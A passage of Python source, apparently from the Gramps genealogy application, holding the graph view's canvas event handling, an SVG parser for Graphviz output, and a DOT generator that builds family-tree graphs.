def edit_bookmarks(self, _widget):
"""
Call the bookmark editor.
"""
self.view.edit_bookmarks(None)
self.load_bookmarks()
def show_bkmark_popup(self, _widget):
"""
Show bookmark popup.
"""
self.load_bookmarks()
self.bkmark_popover.popup()
def hide_bkmark_popover(self, _widget=None, _event=None):
"""
Hide bookmark popup.
"""
self.bkmark_popover.popdown()
def goto_active(self, button=None):
"""
Go to active person.
"""
# check if animation is needed
animation = bool(button)
self.animation.move_to_person(self.active_person_handle, animation)
def move_to_person(self, _menuitem, handle, animate=False):
"""
Move to specified person (by handle).
If the person is not present in the current graphview tree,
show a dialog offering to change the active person.
"""
self.person_to_focus = None
if self.animation.get_item_by_title(handle):
self.animation.move_to_person(handle, animate)
else:
person = self.dbstate.db.get_person_from_handle(handle)
if not person:
return False
quest = (_('Person <b><i>%s</i></b> is not in the current view.\n'
'Do you want to set it active and rebuild the view?')
% escape(displayer.display(person)))
dialog = QuestionDialog2(_("Change active person?"), quest,
_("Yes"), _("No"),
self.uistate.window)
if dialog.run():
self.view.change_active(handle)
def scroll_mouse(self, _canvas, event):
"""
Zoom by mouse wheel.
"""
if event.direction == Gdk.ScrollDirection.UP:
self.zoom_in()
elif event.direction == Gdk.ScrollDirection.DOWN:
self.zoom_out()
# stop further emission of the scroll signal
# to prevent window scrolling
return True
def populate(self, active_person):
"""
Populate the graph with widgets derived from Graphviz.
"""
# set the busy cursor, so the user knows that we are working
self.uistate.set_busy_cursor(True)
if self.uistate.window.get_window().is_visible():
process_pending_events()
self.clear()
self.active_person_handle = active_person
# fit the text to boxes
self.bold_size, self.norm_size = self.fit_text()
self.search_widget.hide_search_popover()
self.hide_bkmark_popover()
# generate DOT and SVG data
dot = DotSvgGenerator(self.dbstate, self.view,
bold_size=self.bold_size,
norm_size=self.norm_size)
graph_data = dot.build_graph(active_person)
del dot
if not graph_data:
# something went wrong while building the all-connected tree,
# so turn off this feature
self.view._config.set('interface.graphview-show-all-connected',
False)
return
self.dot_data = graph_data[0]
self.svg_data = graph_data[1]
parser = GraphvizSvgParser(self, self.view)
parser.parse(self.svg_data)
self.animation.update_items(parser.items_list)
# save transform scale
self.transform_scale = parser.transform_scale
self.set_zoom(self.scale)
# focus on the edited person if possible
if not self.animation.move_to_person(self.person_to_focus, False):
self.goto_active()
self.person_to_focus = None
# update the status bar
self.view.change_page()
self.uistate.set_busy_cursor(False)
def zoom_in(self, _button=None):
"""
Increase zoom scale.
"""
scale_coef = self.scale * 1.1
self.set_zoom(scale_coef)
def zoom_out(self, _button=None):
"""
Decrease zoom scale.
"""
scale_coef = self.scale * 0.9
if scale_coef < 0.01:
scale_coef = 0.01
self.set_zoom(scale_coef)
def set_original_zoom(self, _button):
"""
Set original zoom scale = 1.
"""
self.set_zoom(1)
def fit_to_page(self, _button):
"""
Calculate scale and fit tree to page.
"""
# get the canvas size
bounds = self.canvas.get_root_item().get_bounds()
height_canvas = bounds.y2 - bounds.y1
width_canvas = bounds.x2 - bounds.x1
# get scroll window size
width = self.hadjustment.get_page_size()
height = self.vadjustment.get_page_size()
# prevent division by zero
if height_canvas == 0:
height_canvas = 1
if width_canvas == 0:
width_canvas = 1
# calculate minimum scale
scale_h = (height / height_canvas)
scale_w = (width / width_canvas)
if scale_h > scale_w:
scale = scale_w
else:
scale = scale_h
scale = scale * self.transform_scale
# set the scale if needed, else restore it to the default
if scale < 1:
self.set_zoom(scale)
else:
self.set_zoom(1)
def clear(self):
"""
Clear the graph by creating a new root item.
"""
# remove root item (with all children)
self.canvas.get_root_item().remove()
self.canvas.set_root_item(GooCanvas.CanvasGroup())
def get_widget(self):
"""
Return the graph display widget that includes the drawing canvas.
"""
return self.vbox
def button_press(self, item, _target, event):
"""
Enter in scroll mode when left or middle mouse button pressed
on background.
"""
self.search_widget.hide_search_popover()
self.hide_bkmark_popover()
if not (event.type == getattr(Gdk.EventType, "BUTTON_PRESS") and
item == self.canvas.get_root_item()):
return False
button = event.get_button()[1]
if button == 1 or button == 2:
window = self.canvas.get_parent().get_window()
window.set_cursor(Gdk.Cursor.new(Gdk.CursorType.FLEUR))
self._last_x = event.x_root
self._last_y = event.y_root
self._in_move = True
self.animation.stop_animation()
return False
if button == 3:
self.menu = PopupMenu(self, kind='background')
self.menu.show_menu(event)
return True
return False
def button_release(self, item, target, event):
"""
Exit from scroll mode when button release.
"""
button = event.get_button()[1]
if((button == 1 or button == 2) and
event.type == getattr(Gdk.EventType, "BUTTON_RELEASE")):
self.motion_notify_event(item, target, event)
self.canvas.get_parent().get_window().set_cursor(None)
self._in_move = False
return True
return False
def motion_notify_event(self, _item, _target, event):
"""
Function for motion notify events for drag and scroll mode.
"""
if self._in_move and (event.type == Gdk.EventType.MOTION_NOTIFY or
event.type == Gdk.EventType.BUTTON_RELEASE):
# scale coefficient to prevent flickering when dragging
scale_coef = self.canvas.get_scale()
new_x = (self.hadjustment.get_value() -
(event.x_root - self._last_x) * scale_coef)
self.hadjustment.set_value(new_x)
new_y = (self.vadjustment.get_value() -
(event.y_root - self._last_y) * scale_coef)
self.vadjustment.set_value(new_y)
return True
return False
def set_zoom(self, value):
"""
Set value for zoom of the canvas widget and apply it.
"""
self.scale = value
self.canvas.set_scale(value / self.transform_scale)
def select_node(self, item, target, event):
"""
Perform actions when a node is clicked.
If middle mouse was clicked then try to set scroll mode.
"""
self.search_widget.hide_search_popover()
self.hide_bkmark_popover()
handle = item.title
node_class = item.description
button = event.get_button()[1]
self.person_to_focus = None
# perform double click on node by left mouse button
if event.type == getattr(Gdk.EventType, "DOUBLE_BUTTON_PRESS"):
# Remove all single click events
for click_item in self.click_events:
if not click_item.is_destroyed():
GLib.source_remove(click_item.get_id())
self.click_events.clear()
if button == 1 and node_class == 'node':
GLib.idle_add(self.actions.edit_person, None, handle)
return True
elif button == 1 and node_class == 'familynode':
GLib.idle_add(self.actions.edit_family, None, handle)
return True
if event.type != getattr(Gdk.EventType, "BUTTON_PRESS"):
return False
if button == 1 and node_class == 'node': # left mouse
if handle == self.active_person_handle:
# Find a parent of the active person so that they can become
# the active person; if there are no parents, keep the current
# active person
parent_handle = self.find_a_parent(handle)
if parent_handle:
handle = parent_handle
else:
return True
# redraw the graph based on the selected person
# schedule it for later because a double click can still occur
click_event_id = GLib.timeout_add(200, self.view.change_active,
handle)
# add the single click event to the list; it will be removed if necessary
context = GLib.main_context_default()
self.click_events.append(context.find_source_by_id(click_event_id))
elif button == 3 and node_class: # right mouse
if node_class == 'node':
self.menu = PopupMenu(self, 'person', handle)
self.menu.show_menu(event)
elif node_class == 'familynode':
self.menu = PopupMenu(self, 'family', handle)
self.menu.show_menu(event)
elif button == 2: # middle mouse
# to enter scroll mode ("item" must be changed to the root item)
item = self.canvas.get_root_item()
self.button_press(item, target, event)
return True
def find_a_parent(self, handle):
"""
Locate a parent from the first family that the selected person is a
child of. Try to find the father first, then the mother.
Either will be OK.
"""
person = self.dbstate.db.get_person_from_handle(handle)
try:
fam_handle = person.get_parent_family_handle_list()[0]
if fam_handle:
family = self.dbstate.db.get_family_from_handle(fam_handle)
if family and family.get_father_handle():
handle = family.get_father_handle()
elif family and family.get_mother_handle():
handle = family.get_mother_handle()
except IndexError:
handle = None
return handle
def update_lines_type(self, _menu_item, lines_type, constant):
"""
Save the lines type setting.
"""
self.view._config.set(constant, lines_type)
def update_setting(self, menu_item, constant):
"""
Save changed setting.
menu_item should be Gtk.CheckMenuItem.
"""
self.view._config.set(constant, menu_item.get_active())
def fit_text(self):
"""
Fit the text to the boxes more exactly. Works by rendering some sample
text at the desired size and at a range of scaled font sizes, measuring
the results, and picking the size whose node box fits the expected
text size.
In other words we are telling dot to use different font sizes than
we are actually displaying, since dot doesn't do a good job of
determining the text size.
"""
if not self.retest_font: # skip this unless the font changed.
return self.bold_size, self.norm_size
text = "The quick Brown Fox jumped over the Lazy Dogs 1948-01-01."
dot_test = DotSvgGenerator(self.dbstate, self.view)
dot_test.init_dot()
# These are at the desired font sizes.
dot_test.add_node('test_bold', '<B>%s</B>' % text, shape='box')
dot_test.add_node('test_norm', text, shape='box')
# now add nodes at increasing font sizes
for scale in range(35, 140, 2):
f_size = dot_test.fontsize * scale / 100.0
dot_test.add_node(
'test_bold' + str(scale),
'<FONT POINT-SIZE="%(bsize)3.1f"><B>%(text)s</B></FONT>' %
{'text': text, 'bsize': f_size}, shape='box')
dot_test.add_node(
'test_norm' + str(scale),
text, shape='box', fontsize=("%3.1f" % f_size))
# close the graphviz dot code with a brace
dot_test.write('}\n')
# get DOT and generate SVG data by Graphviz
dot_data = dot_test.dot.getvalue().encode('utf8')
svg_data = dot_test.make_svg(dot_data)
svg_data = svg_data.decode('utf8')
# now let's find the box sizes and font sizes for the generated svg.
points_a = findall(r'points="(.*)"', svg_data, MULTILINE)
font_fams = findall(r'font-family="(.*)" font-weight',
svg_data, MULTILINE)
font_sizes = findall(r'font-size="(.*)" fill', svg_data, MULTILINE)
box_w = []
for points in points_a:
box_pts = points.split()
x_1 = box_pts[0].split(',')[0]
x_2 = box_pts[1].split(',')[0]
box_w.append(float(x_1) - float(x_2) - 16) # adjust for margins
text_font = font_fams[0] + ", " + font_sizes[0] + 'px'
font_desc = Pango.FontDescription.from_string(text_font)
# let's measure the bold text on our canvas at the desired font size
c_text = GooCanvas.CanvasText(parent=self.canvas.get_root_item(),
text='<b>' + text + '</b>',
x=100,
y=100,
anchor=GooCanvas.CanvasAnchorType.WEST,
use_markup=True,
font_desc=font_desc)
bold_b = c_text.get_bounds()
# and measure the normal text on our canvas at the desired font size
c_text.props.text = text
norm_b = c_text.get_bounds()
# now scan through the test boxes, finding the smallest that will hold
# the actual text as measured, and record the dot font size that was used.
for indx in range(3, len(font_sizes), 2):
if box_w[indx] > bold_b.x2 - bold_b.x1:
bold_size = float(font_sizes[indx - 1])
break
for indx in range(4, len(font_sizes), 2):
if box_w[indx] > norm_b.x2 - norm_b.x1:
norm_size = float(font_sizes[indx - 1])
break
self.retest_font = False # we don't do this again until font changes
# return the adjusted font sizes to tell dot to use.
return bold_size, norm_size
#-------------------------------------------------------------------------
#
# GraphvizSvgParser
#
#-------------------------------------------------------------------------
class GraphvizSvgParser(object):
"""
Parses SVG produced by Graphviz and adds the elements to a GooCanvas.
"""
def __init__(self, widget, view):
"""
Initialise the GraphvizSvgParser class.
"""
self.func = None
self.widget = widget
self.canvas = widget.canvas
self.view = view
self.highlight_home_person = self.view._config.get(
'interface.graphview-highlight-home-person')
scheme = config.get('colors.scheme')
self.home_person_color = config.get('colors.home-person')[scheme]
self.font_size = self.view._config.get('interface.graphview-font')[1]
self.tlist = []
self.text_attrs = None
self.func_list = []
self.handle = None
self.func_map = {"g": (self.start_g, self.stop_g),
"svg": (self.start_svg, self.stop_svg),
"polygon": (self.start_polygon, self.stop_polygon),
"path": (self.start_path, self.stop_path),
"image": (self.start_image, self.stop_image),
"text": (self.start_text, self.stop_text),
"ellipse": (self.start_ellipse, self.stop_ellipse),
"title": (self.start_title, self.stop_title)}
self.text_anchor_map = {"start": GooCanvas.CanvasAnchorType.WEST,
"middle": GooCanvas.CanvasAnchorType.CENTER,
"end": GooCanvas.CanvasAnchorType.EAST}
# This list is used as a LIFO stack so that the SAX parser knows
# which Goocanvas object to link the next object to.
self.item_hier = []
# list of persons items, used for animation class
self.items_list = []
self.transform_scale = 1
def parse(self, ifile):
"""
Parse an SVG file produced by Graphviz.
"""
self.item_hier.append(self.canvas.get_root_item())
parser = ParserCreate()
parser.StartElementHandler = self.start_element
parser.EndElementHandler = self.end_element
parser.CharacterDataHandler = self.characters
parser.Parse(ifile)
for key in list(self.func_map.keys()):
del self.func_map[key]
del self.func_map
del self.func_list
del parser
def start_g(self, attrs):
"""
Parse <g> tags.
"""
# The class attribute defines the group type. There should be one
# graph type <g> tag which defines the transform for the whole graph.
if attrs.get('class') == 'graph':
self.items_list.clear()
transform = attrs.get('transform')
item = self.canvas.get_root_item()
transform_list = transform.split(') ')
scale = transform_list[0].split()
scale_x = float(scale[0].lstrip('scale('))
scale_y = float(scale[1])
self.transform_scale = scale_x
if scale_x > scale_y:
self.transform_scale = scale_y
# the scale should be in (0..1);
# fix a graphviz issue in versions > 2.40.1
if self.transform_scale > 1:
self.transform_scale = 1 / self.transform_scale
item.set_simple_transform(self.bounds[1],
self.bounds[3],
self.transform_scale,
0)
item.connect("button-press-event", self.widget.button_press)
item.connect("button-release-event", self.widget.button_release)
item.connect("motion-notify-event",
self.widget.motion_notify_event)
else:
item = GooCanvas.CanvasGroup(parent=self.current_parent())
item.connect("button-press-event", self.widget.select_node)
self.items_list.append(item)
item.description = attrs.get('class')
self.item_hier.append(item)
def stop_g(self, _tag):
"""
Parse </g> tags.
"""
item = self.item_hier.pop()
item.title = self.handle
def start_svg(self, attrs):
"""
Parse <svg> tags.
"""
GooCanvas.CanvasGroup(parent=self.current_parent())
view_box = attrs.get('viewBox').split()
v_left = float(view_box[0])
v_top = float(view_box[1])
v_right = float(view_box[2])
v_bottom = float(view_box[3])
self.canvas.set_bounds(v_left, v_top, v_right, v_bottom)
self.bounds = (v_left, v_top, v_right, v_bottom)
def stop_svg(self, tag):
"""
Parse </svg> tags.
"""
pass
def start_title(self, attrs):
"""
Parse <title> tags.
"""
pass
def stop_title(self, tag):
"""
Parse </title> tags.
Strip off the underscore prefix that was added to fool Graphviz.
"""
self.handle = tag.lstrip("_")
def start_polygon(self, attrs):
"""
Parse <polygon> tags.
Polygons define the boxes around individuals on the graph.
"""
coord_string = attrs.get('points')
coord_count = 5
points = GooCanvas.CanvasPoints.new(coord_count)
nnn = 0
for i in coord_string.split():
coord = i.split(",")
coord_x = float(coord[0])
coord_y = float(coord[1])
points.set_point(nnn, coord_x, coord_y)
nnn += 1
style = attrs.get('style')
if style:
p_style = self.parse_style(style)
stroke_color = p_style['stroke']
fill_color = p_style['fill']
else:
stroke_color = attrs.get('stroke')
fill_color = attrs.get('fill')
if self.handle == self.widget.active_person_handle:
line_width = 3 # thick box
else:
line_width = 1 # thin box
tooltip = self.view.tags_tooltips.get(self.handle)
# highlight the home person
# stroke_color is not '#...' when tags are drawn, so we check this;
# maybe this is not the best way to check for tags, but it works
if self.highlight_home_person and stroke_color[:1] == '#':
home_person = self.widget.dbstate.db.get_default_person()
if home_person and home_person.handle == self.handle:
fill_color = self.home_person_color
item = GooCanvas.CanvasPolyline(parent=self.current_parent(),
points=points,
close_path=True,
fill_color=fill_color,
line_width=line_width,
stroke_color=stroke_color,
tooltip=tooltip)
# turn on tooltip display if we have one
if tooltip:
item_canvas = item.get_canvas()
item_canvas.set_has_tooltip(True)
self.item_hier.append(item)
def stop_polygon(self, _tag):
"""
Parse </polygon> tags.
"""
self.item_hier.pop()
def start_ellipse(self, attrs):
"""
Parse <ellipse> tags.
These define the family nodes of the graph.
"""
center_x = float(attrs.get('cx'))
center_y = float(attrs.get('cy'))
radius_x = float(attrs.get('rx'))
radius_y = float(attrs.get('ry'))
style = attrs.get('style')
if style:
p_style = self.parse_style(style)
stroke_color = p_style['stroke']
fill_color = p_style['fill']
else:
stroke_color = attrs.get('stroke')
fill_color = attrs.get('fill')
tooltip = self.view.tags_tooltips.get(self.handle)
item = GooCanvas.CanvasEllipse(parent=self.current_parent(),
center_x=center_x,
center_y=center_y,
radius_x=radius_x,
radius_y=radius_y,
fill_color=fill_color,
stroke_color=stroke_color,
line_width=1,
tooltip=tooltip)
if tooltip:
item_canvas = item.get_canvas()
item_canvas.set_has_tooltip(True)
self.current_parent().description = 'familynode'
self.item_hier.append(item)
def stop_ellipse(self, _tag):
"""
Parse </ellipse> tags.
"""
self.item_hier.pop()
def start_path(self, attrs):
"""
Parse <path> tags.
These define the links between nodes.
Solid lines represent birth relationships and dashed lines are used
when a child has a non-birth relationship to a parent.
"""
p_data = attrs.get('d')
line_width = attrs.get('stroke-width')
if line_width is None:
line_width = 1
line_width = float(line_width)
style = attrs.get('style')
if style:
p_style = self.parse_style(style)
stroke_color = p_style['stroke']
is_dashed = 'stroke-dasharray' in p_style
else:
stroke_color = attrs.get('stroke')
is_dashed = attrs.get('stroke-dasharray')
if is_dashed:
line_dash = GooCanvas.CanvasLineDash.newv([5.0, 5.0])
item = GooCanvas.CanvasPath(parent=self.current_parent(),
data=p_data,
stroke_color=stroke_color,
line_width=line_width,
line_dash=line_dash)
else:
item = GooCanvas.CanvasPath(parent=self.current_parent(),
data=p_data,
stroke_color=stroke_color,
line_width=line_width)
self.item_hier.append(item)
def stop_path(self, _tag):
"""
Parse </path> tags.
"""
self.item_hier.pop()
def start_text(self, attrs):
"""
Parse <text> tags.
"""
self.text_attrs = attrs
def stop_text(self, tag):
"""
Parse </text> tags.
The text tag contains some textual data.
"""
tag = escape(tag)
pos_x = float(self.text_attrs.get('x'))
pos_y = float(self.text_attrs.get('y'))
anchor = self.text_attrs.get('text-anchor')
style = self.text_attrs.get('style')
# does the following always work with symbols?
if style:
p_style = self.parse_style(style)
font_family = p_style['font-family']
text_font = font_family + ", " + p_style['font-size'] + 'px'
else:
font_family = self.text_attrs.get('font-family')
text_font = font_family + ", " + str(self.font_size) + 'px'
font_desc = Pango.FontDescription.from_string(text_font)
# set bold text using PangoMarkup
if self.text_attrs.get('font-weight') == 'bold':
tag = '<b>%s</b>' % tag
# text color
fill_color = self.text_attrs.get('fill')
GooCanvas.CanvasText(parent=self.current_parent(),
text=tag,
x=pos_x,
y=pos_y,
anchor=self.text_anchor_map[anchor],
use_markup=True,
font_desc=font_desc,
fill_color=fill_color)
def start_image(self, attrs):
"""
Parse <image> tags.
"""
pos_x = float(attrs.get('x'))
pos_y = float(attrs.get('y'))
width = float(attrs.get('width').rstrip(string.ascii_letters))
height = float(attrs.get('height').rstrip(string.ascii_letters))
pixbuf = GdkPixbuf.Pixbuf.new_from_file(attrs.get('xlink:href'))
item = GooCanvas.CanvasImage(parent=self.current_parent(),
x=pos_x,
y=pos_y,
height=height,
width=width,
pixbuf=pixbuf)
self.item_hier.append(item)
def stop_image(self, _tag):
"""
Parse </image> tags.
"""
self.item_hier.pop()
def start_element(self, tag, attrs):
"""
Generic parsing function for opening tags.
"""
self.func_list.append((self.func, self.tlist))
self.tlist = []
try:
start_function, self.func = self.func_map[tag]
if start_function:
start_function(attrs)
except KeyError:
self.func_map[tag] = (None, None)
self.func = None
def end_element(self, _tag):
"""
Generic parsing function for closing tags.
"""
if self.func:
self.func(''.join(self.tlist))
self.func, self.tlist = self.func_list.pop()
def characters(self, data):
"""
Generic parsing function for tag data.
"""
if self.func:
self.tlist.append(data)
def current_parent(self):
"""
Returns the Goocanvas object which should be the parent of any new
Goocanvas objects.
"""
return self.item_hier[-1]
def parse_style(self, style):
"""
Parse style attributes for Graphviz version < 2.24.
"""
style = style.rstrip(';')
return dict([i.split(':') for i in style.split(';')])
#------------------------------------------------------------------------
#
# DotSvgGenerator
#
#------------------------------------------------------------------------
class DotSvgGenerator(object):
"""
Generator of graphing instructions in dot format and svg data by Graphviz.
"""
def __init__(self, dbstate, view, bold_size=0, norm_size=0):
"""
Initialise the DotSvgGenerator class.
"""
self.bold_size = bold_size
self.norm_size = norm_size
self.dbstate = dbstate
self.uistate = view.uistate
self.database = dbstate.db
self.view = view
self.dot = None # will be StringIO()
# This dictionary contains person handle as the index and the value is
# the number of families in which the person is a parent. From this
# dictionary is obtained a list of person handles sorted in decreasing
# value order which is used to keep multiple spouses positioned
# together.
self.person_handles_dict = {}
self.person_handles = []
# list of persons on path to home person
self.current_list = list()
self.home_person = None
# Gtk style context for scrollwindow
self.context = self.view.graph_widget.sw_style_context
# font if we use genealogical symbols
self.sym_font = None
self.avatars = Avatars(self.view._config)
def __del__(self):
"""
Free stream file on destroy.
"""
if self.dot:
self.dot.close()
def init_dot(self):
"""
Init/reinit stream for dot file.
Load and write config data to start of dot file.
"""
if self.dot:
self.dot.close()
self.dot = StringIO()
self.current_list.clear()
self.person_handles_dict.clear()
self.show_images = self.view._config.get(
'interface.graphview-show-images')
self.show_avatars = self.view._config.get(
'interface.graphview-show-avatars')
self.show_full_dates = self.view._config.get(
'interface.graphview-show-full-dates')
self.show_places = self.view._config.get(
'interface.graphview-show-places')
self.place_format = self.view._config.get(
'interface.graphview-place-format') - 1
self.show_tag_color = self.view._config.get(
'interface.graphview-show-tags')
spline = self.view._config.get('interface.graphview-show-lines')
self.spline = SPLINE.get(int(spline))
self.descendant_generations = self.view._config.get(
'interface.graphview-descendant-generations')
self.ancestor_generations = self.view._config.get(
'interface.graphview-ancestor-generations')
self.person_theme_index = self.view._config.get(
'interface.graphview-person-theme')
self.show_all_connected = self.view._config.get(
'interface.graphview-show-all-connected')
ranksep = self.view._config.get('interface.graphview-ranksep')
ranksep = ranksep * 0.1
nodesep = self.view._config.get('interface.graphview-nodesep')
nodesep = nodesep * 0.1
self.avatars.update_current_style()
# get background color from gtk theme and convert it to hex
# else use white background
bg_color = self.context.lookup_color('theme_bg_color')
if bg_color[0]:
bg_rgb = (bg_color[1].red, bg_color[1].green, bg_color[1].blue)
bg_color = rgb_to_hex(bg_rgb)
else:
bg_color = '#ffffff'
# get font color from gtk theme and convert it to hex
# else use black font
font_color = self.context.lookup_color('theme_fg_color')
if font_color[0]:
fc_rgb = (font_color[1].red, font_color[1].green,
font_color[1].blue)
font_color = rgb_to_hex(fc_rgb)
else:
font_color = '#000000'
# get colors from config
home_path_color = self.view._config.get(
'interface.graphview-home-path-color')
# set of colors
self.colors = {'link_color': font_color,
'home_path_color': home_path_color}
self.arrowheadstyle = 'none'
self.arrowtailstyle = 'none'
dpi = 72
# use font from config if needed
font = self.view._config.get('interface.graphview-font')
fontfamily = self.resolve_font_name(font[0])
self.fontsize = font[1]
if not self.bold_size:
self.bold_size = self.norm_size = font[1]
pagedir = "BL"
rankdir = "TB"
ratio = "compress"
# as we are not using paper,
# choose a large 'page' size with no margin
sizew = 100
sizeh = 100
xmargin = 0.00
ymargin = 0.00
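# write the dot header: graph-level attributes first, then node and
# edge defaults; the caller later adds person/family nodes and closes
# the graph with '}'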
self.write('digraph GRAMPS_graph\n')
self.write('{\n')
self.write(' bgcolor="%s";\n' % bg_color)
self.write(' center="false"; \n')
self.write(' charset="utf8";\n')
self.write(' concentrate="false";\n')
self.write(' dpi="%d";\n' % dpi)
self.write(' graph [fontsize=%3.1f];\n' % self.fontsize)
self.write(' margin="%3.2f,%3.2f"; \n' % (xmargin, ymargin))
self.write(' mclimit="99";\n')
self.write(' nodesep="%.2f";\n' % nodesep)
self.write(' outputorder="edgesfirst";\n')
self.write(' pagedir="%s";\n' % pagedir)
self.write(' rankdir="%s";\n' % rankdir)
self.write(' ranksep="%.2f";\n' % ranksep)
self.write(' ratio="%s";\n' % ratio)
self.write(' searchsize="100";\n')
self.write(' size="%3.2f,%3.2f"; \n' % (sizew, sizeh))
self.write(' splines=%s;\n' % self.spline)
self.write('\n')
self.write(' edge [style=solid fontsize=%d];\n' % self.fontsize)
if fontfamily:
self.write(' node [style=filled fontname="%s" '
'fontsize=%3.1f fontcolor="%s"];\n'
% (fontfamily, self.norm_size, font_color))
else:
self.write(' node [style=filled fontsize=%3.1f fontcolor="%s"];\n'
% (self.norm_size, font_color))
self.write('\n')
self.uistate.connect('font-changed', self.font_changed)
self.symbols = Symbols()
self.font_changed()
def resolve_font_name(self, font_name):
"""
Help Graphviz resolve the font name.
"""
# Sometimes Graphviz has problems resolving fonts.
font_family_map = {"Times New Roman": "Times",
"Times Roman": "Times",
"Times-Roman": "Times",
}
font = font_family_map.get(font_name)
if font is None:
font = font_name
return font
def font_changed(self):
dth_idx = self.uistate.death_symbol
if self.uistate.symbols:
self.bth = self.symbols.get_symbol_for_string(
self.symbols.SYMBOL_BIRTH)
self.dth = self.symbols.get_death_symbol_for_char(dth_idx)
else:
self.bth = self.symbols.get_symbol_fallback(
self.symbols.SYMBOL_BIRTH)
self.dth = self.symbols.get_death_symbol_fallback(dth_idx)
# make sure to display in selected symbols font
self.sym_font = config.get('utf8.selected-font')
self.bth = '<FONT FACE="%s">%s</FONT>' % (self.sym_font, self.bth)
self.dth = '<FONT FACE="%s">%s</FONT>' % (self.sym_font, self.dth)
def build_graph(self, active_person):
"""
Builds a GraphViz tree based on the active person.
"""
# reinit dot file stream (write starting graphviz dot code to file)
self.init_dot()
if active_person:
self.home_person = self.dbstate.db.get_default_person()
self.set_current_list(active_person)
self.set_current_list_desc(active_person)
if self.show_all_connected:
try:
self.person_handles_dict.update(
self.find_connected(active_person))
except:
w_msg = _("Can't build graph with all connections to "
"active person. This option will be disabled. "
"You can try to reduce generations count "
"settings and enable it again.")
logging.warning(w_msg)
WarningDialog(_('Disabling "All Connected" option'), w_msg)
return False
else:
self.person_handles_dict.update(
self.find_descendants(active_person))
self.person_handles_dict.update(
self.find_ancestors(active_person))
if self.person_handles_dict:
self.person_handles = sorted(
self.person_handles_dict,
key=self.person_handles_dict.__getitem__,
reverse=True)
self.add_persons_and_families()
self.add_child_links_to_families()
# close the graphviz dot code with a brace
self.write('}\n')
# get DOT and generate SVG data by Graphviz
dot_data = self.dot.getvalue().encode('utf8')
svg_data = self.make_svg(dot_data)
return (dot_data, svg_data)
def make_svg(self, dot_data):
"""
Make SVG data by Graphviz.
"""
if win():
svg_data = Popen(['dot', '-Tsvg'],
creationflags=DETACHED_PROCESS,
stdin=PIPE,
stdout=PIPE,
stderr=PIPE).communicate(input=dot_data)[0]
else:
svg_data = Popen(['dot', '-Tsvg'],
stdin=PIPE,
stdout=PIPE).communicate(input=dot_data)[0]
return svg_data
def set_current_list(self, active_person, recurs_list=None):
"""
Get the path from the active person to the home person.
Select ancestors.
"""
if not active_person:
return False
person = self.database.get_person_from_handle(active_person)
if recurs_list is None:
recurs_list = set() # make a recursion check list (actually a set)
# see if we have a recursion (database loop)
elif active_person in recurs_list:
logging.warning(_("Relationship loop detected"))
return False
recurs_list.add(active_person) # record where we have been for check
if person == self.home_person:
self.current_list.append(active_person)
return True
else:
for fam_handle in person.get_parent_family_handle_list():
family = self.database.get_family_from_handle(fam_handle)
if self.set_current_list(family.get_father_handle(),
recurs_list=recurs_list):
self.current_list.append(active_person)
self.current_list.append(fam_handle)
return True
if self.set_current_list(family.get_mother_handle(),
recurs_list=recurs_list):
self.current_list.append(active_person)
self.current_list.append(fam_handle)
return True
return False
def set_current_list_desc(self, active_person, recurs_list=None):
"""
Get the path from the active person to the home person.
Select children.
"""
if not active_person:
return False
person = self.database.get_person_from_handle(active_person)
if recurs_list is None:
recurs_list = set() # make a recursion check list (actually a set)
# see if we have a recursion (database loop)
elif active_person in recurs_list:
logging.warning(_("Relationship loop detected"))
return False
recurs_list.add(active_person) # record where we have been for check
if person == self.home_person:
self.current_list.append(active_person)
return True
else:
for fam_handle in person.get_family_handle_list():
family = self.database.get_family_from_handle(fam_handle)
for child in family.get_child_ref_list():
if self.set_current_list_desc(child.ref,
recurs_list=recurs_list):
self.current_list.append(active_person)
self.current_list.append(fam_handle)
return True
return False
def find_connected(self, active_person):
"""
Spider the database from the active person.
"""
person = self.database.get_person_from_handle(active_person)
person_handles = {}
self.add_connected(person, self.descendant_generations,
self.ancestor_generations, person_handles)
return person_handles
def add_connected(self, person, num_desc, num_anc, person_handles):
"""
Include everyone connected to the active person in the list of people
to graph.
"""
if not person:
return
# check if handle is not already processed
if person.handle not in person_handles:
spouses_list = person.get_family_handle_list()
# add self
person_handles[person.handle] = len(spouses_list)
else:
return
# add descendants
if num_desc >= 0: # generation restriction
for family_handle in spouses_list:
family = self.database.get_family_from_handle(family_handle)
if num_desc > 0: # generation restriction
# add every child recursively
for child_ref in family.get_child_ref_list():
if child_ref.ref in person_handles:
continue
self.add_connected(
self.database.get_person_from_handle(child_ref.ref),
num_desc-1, num_anc+1, person_handles)
# add person spouses
for sp_handle in (family.get_father_handle(),
family.get_mother_handle()):
if sp_handle and sp_handle not in person_handles:
self.add_connected(
self.database.get_person_from_handle(sp_handle),
num_desc, num_anc, person_handles)
# add ancestors
if num_anc > 0: # generation restriction
for family_handle in person.get_parent_family_handle_list():
family = self.database.get_family_from_handle(family_handle)
# add every ancestor's spouses
for sp_handle in (family.get_father_handle(),
family.get_mother_handle()):
if sp_handle and sp_handle not in person_handles:
self.add_connected(
self.database.get_person_from_handle(sp_handle),
num_desc+1, num_anc-1, person_handles)
def find_descendants(self, active_person):
"""
Spider the database from the active person.
"""
person = self.database.get_person_from_handle(active_person)
person_handles = {}
self.add_descendant(person, self.descendant_generations,
person_handles)
return person_handles
def add_descendant(self, person, num_generations, person_handles):
"""
Include a descendant in the list of people to graph.
"""
if not person:
return
# check if handle is not already processed
# and add self and spouses
if person.handle not in person_handles:
spouses_list = person.get_family_handle_list()
person_handles[person.handle] = len(spouses_list)
self.add_spouses(person, person_handles)
else:
return
if num_generations <= 0:
return
# add every child recursively
for family_handle in spouses_list:
family = self.database.get_family_from_handle(family_handle)
for child_ref in family.get_child_ref_list():
self.add_descendant(
self.database.get_person_from_handle(child_ref.ref),
num_generations - 1, person_handles)
def add_spouses(self, person, person_handles):
"""
Add spouses to the list.
"""
if not person:
return
for family_handle in person.get_family_handle_list():
sp_family = self.database.get_family_from_handle(family_handle)
for sp_handle in (sp_family.get_father_handle(),
sp_family.get_mother_handle()):
if sp_handle and sp_handle not in person_handles:
# add only spouse (num_generations = 0)
self.add_descendant(
self.database.get_person_from_handle(sp_handle),
0, person_handles)
def find_ancestors(self, active_person):
"""
Spider the database from the active person.
"""
person = self.database.get_person_from_handle(active_person)
person_handles = {}
self.add_ancestor(person, self.ancestor_generations, person_handles)
return person_handles
def add_ancestor(self, person, num_generations, person_handles):
"""
Include an ancestor in the list of people to graph.
"""
if not person:
return
# add self if handle is not already processed
if person.handle not in person_handles:
person_handles[person.handle] = len(person.get_family_handle_list())
